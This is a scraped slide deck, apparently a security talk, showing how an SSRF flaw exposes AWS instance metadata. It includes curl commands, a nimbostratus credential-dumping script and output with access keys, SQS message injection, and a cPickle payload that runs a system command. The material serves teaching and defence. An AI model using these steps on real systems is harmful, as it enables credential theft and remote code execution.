http request proxying vulnerability
play

HTTP request proxying vulnerability andres@laptop:~/$ curl - PowerPoint PPT Presentation

Mar 23, 2024 •291 likes •697 views

HTTP request proxying vulnerability andres@laptop:~/$ curl http://target.com/?url=http://httpbin.org/user-agent andres@laptop:~/$ { "user-agent": "python-requests/1.2.3 CPython/2.7.3 Linux/3.2.0-48- virtual" }

  2. HTTP request proxying vulnerability andres@laptop:~/$ curl http://target.com/?url=http://httpbin.org/user-agent andres@laptop:~/$ { "user-agent": "python-requests/1.2.3 CPython/2.7.3 Linux/3.2.0-48- virtual" } andres@laptop:~/$ curl http://httpbin.org/user-agent andres@laptop:~/$ { "user-agent": "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3" } 2 * We use twitter.com as an example. No twitter server(s) were compromised.

  3. Maybe if this is hosted at Amazon... andres@laptop:~/$ curl http://target.com/?\ andres@laptop:~/$ url=http://169.254.169.254/latest/meta-data/ami-id ami-a02f66f2 <---- the http response body me jumping with joy -----> 3

  4. Instance meta-data Each time an EC2 instance starts, AWS attaches a “meta-data ● server” to it, which can be accessed from the instance itself using http://169.254.169.254/ The instance meta-data stores information such as: ● – AMI id: operating system which was used to boot the instance – Private IP address – Instance type: number of cores, memory, etc. – Amazon region 4

  5. The meta-data HTTP server Now we know about the meta-data server and our map of the target architecture looks like: 5 * We use twitter.com as an example. No twitter server(s) were compromised.

  6. Programmatically accessing the meta-data ● Developers use libraries such as boto (Python) and fog (Ruby) to access the instance meta-data in a programmatic way ● The meta-data is always accessed locally , from within the EC2 instance. ● The meta-data is organized in paths , which are well documented. Some paths are static and others change based on the names of objects retrieved from other objects/paths. ● Wrote a wrapper which monkey-patches boto and allows us to use it to retrieve remote meta-data. 6

  7. Monkey-Patching for automated meta-data dump Develop your own core.utils.mangle.mangle function to extract meta-data from this specific target: import requests NOT_FOUND = '404 - Not Found' VULN_URL = 'http://target.com/?url=%s' def mangle(method, uri, headers): mangled_url = VULN_URL % uri logging.debug('Requesting %s' % mangled_url) try : response = requests.get(mangled_url) except Exception , e: logging.exception('Unhandled exception in mangled request: %s' % e) code = 200 if NOT_FOUND in response.text: code = 404 7 return (code, headers, response.text)

  8. Automated meta-data dump with nimbostratus Now that we have our customized mangle function to exploit the vulnerability we can run nimbostratus to dump all meta-data: andres@laptop:~/$ ./nimbostratus -v dump-ec2-metadata --mangle- andres@laptop:~/$ function=core.utils.mangle.mangle Starting dump-ec2-metadata Requesting http://target.com/?url=http://169.254.169.254/latest/meta-data/ Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/instance-type Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/instance-id ... Instance type: t1.micro AMI ID: ami-a02f66f2 Security groups: django_frontend_nimbostratus_sg Availability zone: ap-southeast-1a Architecture: x86_64 Private IP: 10.130.81.89 User data script was written to user-data.txt 8

  9. User-data: OS boot scripts AWS allows you to set a startup script using the EC2 user-data ● parameter when starting a new instance. This is useful for automating the installation and configuration of software on EC2 instances. User-data scripts are run on boot time, Ubuntu has cloud-init ● daemon , and are made available to the instance using it's meta- data The security implications of user-data (*) are know for some time ● now but there aren't any definitive solutions for it 9 * http://alestic.com/2009/06/ec2-user-data-scripts

  10. User data scripts: Full of win #!/usr/bin/python # Where to get the code from REPO = 'git@github.com:andresriancho/nimbostratus-target.git' # How to access the code DEPLOY_PRIVATE_KEY = '''\ -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAu/JhMBoH+XQfMMAVj23hn2VHa2HeDJi3FLri3Be5Ky/qZPSC … 55vBktYGkV3RiPswHiUffTsPG353swZ2P9uAmLUiZ1EjugIEplkMN6XG8c0kXGFp dZdlX50+xrrZFoPRXT7zgepKBVzf7+m1PxViHJxthPw/p0BVbc6OVA== -----END RSA PRIVATE KEY----- ''' DEPLOY_PUBLIC_KEY = '''\ ssh-rsa AAAAB3N...xd4N9TAT0GDFR admin@laptop ''' … def clone_repository(): run_cmd('git clone %s nimbostratus-target' % VULNWEB_REPO) run_cmd('pip install --use-mirrors --upgrade -r requirements.txt', cwd='nimbostratus-target') remove_keys() 10

  11. The keys to the kingdom 11

  12. Cloud applications consume cloud services 12

  13. An Instagram clone consuming AWS services 13

  14. Instance profiles Instance profiles give EC2 instances a way to access AWS services such ● as S3 , SQS, RDS, IAM, etc. Define an IAM Role: “SQS Read access” and then assign it to an instance. ● AWS creates a unique set of credentials for that EC2 instance / instance ● profile and makes them available through meta-data 14

  15. Dumping instance profile credentials andres@laptop:~/$ ./nimbostratus -v dump-credentials --mangle- andres@laptop:~/$ function=core.utils.mangle.mangle Starting dump-credentials Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/iam/security-credentials/ Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/iam/security-credentials/django_frontend_nimbostratus Found credentials Access key: ASIAJ5BQOUJRD4OPB4SQ Secret key: 73PUhbs7roCKP5zUEwUakH+49US4KTzp0j4oeuwF Token: AQoDYXdzEEwaoAJRYenYVU/KY7L5S3NGR5q9pgwrmcyHEF0XVigxyltxAY2m0cuRLfHd2b/vMxS W8Y2keAa5q4iCV0GlEXVuSpLkj1GL3XB3vU5nbUh0iPHA2GGV4DDXTv8P6NpqWZfuqFBRnvQz37 OtyFUhw6W+dog50BuY48vBW4nPWUriVEMWBKk9cF1voO/W/COHh5rQnKFhVzKUgPdDDzKKKytq2 tS6UzTXFQGNb/v7CYY5Cbp11kYHJWB0pFkodYPF1tt7f0akqBO1dA8OFIoRcHSsh5LBKcaDJDlx 4dkyvcU/nx45Fvq2Z3Twbi7iU6f1RsF8X8puxK+BYe8T/aL6OIYZzNGJDiTwi83pjP7AofbIL0V EPvjIG54DZlN52/cJpL214tsgxOPzkAU= 15 * The target is defined in core.utils.mangle.mangle

  16. Enumerating permissions with nimbostratus Once the credentials were dumped, you can use them from any host, in this particular case to enumerate the permissions: andres@laptop:~/$ ./nimbostratus -v dump-permissions --access-key andres@laptop:~/$ ASIAJ5BQOUJRD4OPB4SQ --secret-key 73PUhbs7roCKP5zUEwUakH+49US4KTzp0j4oeuwF --token AqoDYXdz...nx45FvOPzkAU= Starting dump-permissions Failed to get all users: "User: arn:aws:sts::334918212912:assumed- role/django_frontend_nimbostratus/i-0bb4975c is not authorized to perform: iam:ListUsers on resource: arn:aws:iam::334918212912:user/" DescribeImages is not allowed: "You are not authorized to perform this operation." DescribeInstances is not allowed: "You are not authorized to perform this operation." DescribeInstanceStatus is not allowed: "You are not authorized to perform this operation." ListQueues IS allowed {u'Statement': [{u'Action': ['ListQueues'], u'Effect': u'Allow', u'Resource': u'*'}], u'Version': u'2012-10-17'} 16

  17. Exploring SQS using the instance profile credentials >>> import boto.sqs >>> from boto.sqs.connection import SQSConnection # RegionInfo:ap-southeast-1 >>> region = boto.sqs.regions()[6] >>> conn = SQSConnection(region=region, aws_access_key_id='ASIAJ5BQOUJRD4OPB4SQ', aws_secret_access_key='73PUhbs7roCKP5zUEwUakH+49US4KTzp0j4oeuwF', security_token='AQo...kAU=') >>> conn.get_all_queues() [Queue(https://ap-southeast- 1.queue.amazonaws.com/334918212912/nimbostratus-celery),] >>> q = conn.get_queue('nimbostratus-celery') >>> m = q.get_messages(1)[0] >>> m.get_body() '{"body": "g...3dhcmdzcRF9cRJ1Lg==", "headers": {}, "content-type": "application/x-python-serialize" , "properties": {"body_encoding": "base64", "delivery_info": {"priority": 0, "routing_key": "celery", "exchange": "celery"}, "delivery_mode": 2, "delivery_tag": "c60e66e0- 90e6-4880-9c22-866ba615927e"}, "content-encoding": "binary"}' 17

  18. SQS write access: Yep! Continues Python session from previous slide >>> from boto.sqs.message import Message >>> q = conn.get_queue('nimbostratus-celery') >>> m = Message() >>> m.set_body('The test message') >>> status = q.write(m) >>> status <boto.sqs.message.Message instance at 0x21c25a8> 18

  19. 19

  20. Identified SQS queue and workers The remote architecture looked like this: 20 * We use twitter.com as an example. No twitter server(s) were compromised.

  21. Celery knows it's weaknesses (but uses pickle as it's default anyway) A quote from Celery's documentation: In this case the clients are trusted and the broker is authenticated, but we gained access to the SQS credentials and can inject messages into the SQS queue! 21 * SSL Signing of broker messages is a good fix for this vulnerability

  22. Insecure object (de)serialization widely known vulnerability >>> import cPickle # Expected use >>> cPickle.dumps( ('a', 1) ) "(S'a'\nI1\ntp1\n." >>> cPickle.loads("(S'a'\nI1\ntp1\n.") ('a', 1) # The vulnerability is here: >>> cPickle.loads("cos\nsystem\n(S'ls'\ntR.'\ntR.") . .. foo bar spam eggs 0 >>> 22

Recommend

Recap: HTTP request/response HTTP request http://red1.cs.panam.edu/~etomai/links/first.html

Recap: HTTP request/response HTTP request http://red1.cs.panam.edu/~etomai/links/first.html

Recap: HTTP request/response HTTP request http://red1.cs.panam.edu/~etomai/links/first.html Hostname is resolved to IP address (e.g. 129.113.132.218) Request type is GET or POST Client Server Request headers give information about

326 views • 5 slides
DNSSEC and DNS Proxying DNS is hard at scale when you are a huge target 2 CloudFlare

DNSSEC and DNS Proxying DNS is hard at scale when you are a huge target 2 CloudFlare

DNSSEC and DNS Proxying DNS is hard at scale when you are a huge target 2 CloudFlare DNS is big 3 CloudFlare DNS is fast 4 CloudFlare DNS is always under attack 5 CloudFlare A secure reverse proxy for http(s)

538 views • 25 slides
Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request

Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request

Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request An HTTP request consists of: a request method (verb) , resource URL , header fields ( metadata ), body ( data ) HTTP 1.1 defines 9 request

1.47k views • 136 slides
Syscall Proxying Simulating Remote Execution Maximiliano Cceres maximiliano.caceres@corest.com

Syscall Proxying Simulating Remote Execution Maximiliano Cceres maximiliano.caceres@corest.com

Syscall Proxying Simulating Remote Execution Syscall Proxying Simulating Remote Execution Maximiliano Cceres maximiliano.caceres@corest.com Caesars Palace, Las Vegas, NV, USA July 31st, 2002 Syscall Proxying Simulating Remote Execution

779 views • 42 slides
Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day 2 Today's Agenda 1. Integrate HTTP Request to the app 2. Parse JSON Data 3. Sharing Pro Android S - Day 2 HTTP Request &amp; Response Pro

461 views • 13 slides
Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a

Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a

Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a cybersecurity flaw in a system that leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system

407 views • 16 slides
HTTP Persistence &amp; Server parses request, responds, and closes TCP connection Web Caching

HTTP Persistence &amp; Server parses request, responds, and closes TCP connection Web Caching

COMP 431 HTTP Protocol Design Internet Services &amp; Protocols Non-persistent connections The default browser/server behavior in HTTP/1.0 is for the connection to be closed after the completion of the request HTTP Persistence &amp;

138 views • 12 slides
HTTP - Request/ Response HTTP - Documentation HTTP/1.1 is defined by RFC2616 of the IETF

HTTP - Request/ Response HTTP - Documentation HTTP/1.1 is defined by RFC2616 of the IETF

HTTP - Request/ Response HTTP - Documentation HTTP/1.1 is defined by RFC2616 of the IETF https://tools.ietf.org/html/rfc2616 This is THE document for all your questions about HTTP Today we'll discus topics in sections 4, 5, and 6

251 views • 13 slides
WebSocket Server Implementation Chao-Wei Peng HTTP Request Model Service Http Client Http

WebSocket Server Implementation Chao-Wei Peng HTTP Request Model Service Http Client Http

WebSocket Server Implementation Chao-Wei Peng HTTP Request Model Service Http Client Http Server Thread Waiting Http Request Run Service Http Response HTTP Weakness Server sends response only if someone requests it. WebSocket Protocol

274 views • 11 slides
Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE

Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE

Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request An HTTP request consists of: a request method (verb) , resource URL , header fields ( metadata ), body ( data ) HTTP 1.1

1.84k views • 146 slides
PR Web Web Based Customer Requirement Request System http://samhc20144/acquiline/ What is

PR Web Web Based Customer Requirement Request System http://samhc20144/acquiline/ What is

PR Web Web Based Customer Requirement Request System http://samhc20144/acquiline/ What is Acquiline Customer Request Electronic Means of Submitting Purchase Request to Contracting Purchase Request Status Allows Users

1.09k views • 82 slides
Social Media Assignment 1 Concepts Standard HTTP Assignment 0 uses standard HTTP request

Social Media Assignment 1 Concepts Standard HTTP Assignment 0 uses standard HTTP request

Social Media Assignment 1 Concepts Standard HTTP Assignment 0 uses standard HTTP request and response Requests can be GET, POST, etc. req represents request and res represents response. A client sends request to the server, then

518 views • 20 slides
Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a

Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a

Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a significant shock that brings welfare below a socially accepted level (Khl, 2003) Vulnerability increases when there is uncertainty with respect to

529 views • 21 slides
Contents What is vulnerability? Why conduct vulnerability assessments? Defining

Contents What is vulnerability? Why conduct vulnerability assessments? Defining

6/19/2015 Vulnerability and Capacity Assessment Index (VCAI) for Climate Change Adaptation SVRK Prabhakar USAID ADAPT Asia-Pacific Presented at NABARD Training Workshop, Mumbai on 18 June 2015 Contents What is vulnerability? Why

705 views • 21 slides
WWW HTTP, Ajax, APIs, REST HTTP Hypertext Transfer Protocol Request Web Client HTTP Server

WWW HTTP, Ajax, APIs, REST HTTP Hypertext Transfer Protocol Request Web Client HTTP Server

WWW HTTP, Ajax, APIs, REST HTTP Hypertext Transfer Protocol Request Web Client HTTP Server WSGI Response Python Web Application Connectionless Media Independent Stateless WSGI : Web Server Gateway Interface 2 HTTP Methods

395 views • 28 slides
Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1

Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1

Vulnerability Analysis and Food Aid W orking Group Chaired by W FP/ VAM Unit Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1 Overview 1 . Methodology of the VA 2 0 0 4 2 . Highlights of

703 views • 28 slides
Limited Proxying for Content Filtering based on X.509 Proxy Certificate Profile Islam Faisal* and

Limited Proxying for Content Filtering based on X.509 Proxy Certificate Profile Islam Faisal* and

Limited Proxying for Content Filtering based on X.509 Proxy Certificate Profile Islam Faisal* and Sherif El-Kassas The American University in Cairo, Egypt * Travel supported by AUC Undergraduate Research Grant UG#1810898 Content Filtering: What

193 views • 16 slides
Zorp and KZorp: Integrating Packet Filtering and Userspace proxying Balzs Scheidler

Zorp and KZorp: Integrating Packet Filtering and Userspace proxying Balzs Scheidler

Zorp and KZorp: Integrating Packet Filtering and Userspace proxying Balzs Scheidler &lt;bazsi@balabit.com&gt; www.balabit.com Zorp Has been established in 2000, as the fjrst BalaBit product Code was GPLd right from the start Initial set

590 views • 20 slides
Vulnerability Screening Tool Identifying and addressing vulnerability: A tool for asylum and

Vulnerability Screening Tool Identifying and addressing vulnerability: A tool for asylum and

Vulnerability Screening Tool Identifying and addressing vulnerability: A tool for asylum and migration systems Purpose Intended to guide &amp; inform frontline workers &amp; decision makers on the relevance of vulnerability factors to

507 views • 19 slides
Earthquake Vulnerability Earthquake Vulnerability Vulnerability Assessment &amp; EVR measures

Earthquake Vulnerability Earthquake Vulnerability Vulnerability Assessment &amp; EVR measures

Earthquake Vulnerability Earthquake Vulnerability Vulnerability Assessment &amp; EVR measures Islamabad Pakistan Assessment and Vulnerability Assessment and Vulnerability Reduction Measures Reduction Measures adpc Asian Disaster

702 views • 46 slides
HTTP Review Carey Williamson Department of Computer Science University of Calgary Credit: Most

HTTP Review Carey Williamson Department of Computer Science University of Calgary Credit: Most

HTTP Review Carey Williamson Department of Computer Science University of Calgary Credit: Most of this content was provided by Erich Nahum (IBM Research) Introduction to HTTP http request http request http response http response Laptop w/

416 views • 14 slides
HTTP HTTP: HyperText Transfer Protocol Basis for fetching Web pages request Network CSE 461

HTTP HTTP: HyperText Transfer Protocol Basis for fetching Web pages request Network CSE 461

HTTP HTTP: HyperText Transfer Protocol Basis for fetching Web pages request Network CSE 461 University of Washington 2 Sir Tim Berners-Lee (1955) Inventor of the Web Dominant Internet app since mid 90s He now directs the W3C

443 views • 41 slides
Introduction What is Disaster vulnerability? Vulnerability is the inability to resist a

Introduction What is Disaster vulnerability? Vulnerability is the inability to resist a

Vulnerability to Disasters: A Gendered Analysis on Water Availability and Livelihoods in Nadu Colony, Kovalam, Chennai, India Group No: 02 Sumaia Kashem Shreeya Lohani Shanmuga Priya. G Meththa Prabodhani Menike

834 views • 40 slides
1 Request Request/ /Response Response syntax syntax Request-Line (mandatory)

1 Request Request/ /Response Response syntax syntax Request-Line (mandatory)

Lecture 3. Lecture 3. HTTP v1.0 HTTP v1.0 application application layer layer protocol protocol into details details into HTTP 1.0: RFC 1945, HTTP 1.0: RFC 1945, T. T. Berners Berners- -Lee Lee, R. , R. Fielding Fielding, , H. H.

341 views • 11 slides

More recommend